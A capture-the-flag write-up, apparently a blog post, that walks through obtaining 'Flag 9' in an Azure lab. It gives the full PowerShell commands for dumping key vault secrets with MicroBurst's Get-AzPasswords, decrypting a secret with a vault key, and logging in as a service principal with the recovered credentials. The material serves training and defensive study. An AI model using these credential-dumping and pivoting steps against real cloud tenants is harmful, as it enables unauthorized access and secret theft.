Flag 9

Continuing on with the enumeration of the key vault, there are few other secrets within it.

  • 0704d1bc-950f-42c8-b0cd-c0569d111da1

  • Ascension

  • Flag8

  • Flag9

Attempting to list Flag9 will show a forbidden error.

I decided to use MicroBurst Get-AzPasswords as I didnt want to manually list the remaining secrets. I refer to this NETSPI blog on how to utilize the Get-AzPasswords

git clone https://github.com/NetSPI/MicroBurst
ipmo .\MicroBurst.psm1

Get-AzPasswords -Keys Y

Luckily I used the Get-AzPasswords as I wasn’t aware that the user has the ability to retrieve the key vault keys LICIACube.

In the 0704d1bc-950f-42c8-b0cd-c0569d111da1 secret, it shows an encrypted text. After some googling, I found this article that shows how to decrypt using the key vault key.

$value = ConvertTo-SecureString -String "HcnxYfKieTn2XIJ54MCcSINWdSzWbWML06lbdkGei5PaTKrcJeru2fopglY3AM6x1W+rnx/xT7P9TfuUpaTV1MGqeC+NuW/Lh45ftdBUUZA+68Dv3AJQ909UR24eLBRC8r5y9/BGqbLZnQZCq8GGT5S78SQaS+QU1oOz5vMvijLE9j/CbHHSPKk2/Nof+xXOznwIsjwyaihjdXlDDDEE26OB7awkn5wGHJX7/bgCJw9HaqpJC5BDa+kD3gsZGg3Y8+7dKeow+D0tZHpk4IFBEsPg68BgYgugn/LDgZr8fifugjw+rpErqm4mDjQikYO1qwFowj0uUH4KSqYqZ+4+DQ==" -AsPlainText -Force

Invoke-AzKeyVaultKeyOperation -Operation "Decrypt" -Algorithm "RSA1_5" -Name "LICIACube" -VaultName "cubesat" -Value $value

With the new set of credentials, I attempt to login using the Connect-AzAccount cmdlets.


$tid= '5f487283-b88e-4ade-8035-7bcaac4156b3'

$creds = (ConvertTo-SecureString $secret -AsPlainText -Force)
$creds = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $appid,$creds

Connect-AzAccount -ServicePrincipal -TenantId $tid -Credential $creds

Running Get-AzResource shows the service principal having access to a cosmosdb and key vault.

I am then able to retrieve the Flag9 from the keyvault now.

Get-AzKeyVaultSecret -VaultName cubesat -Name Flag9 -AsPlainText

Flag 9 : Prepare for impact!

Last updated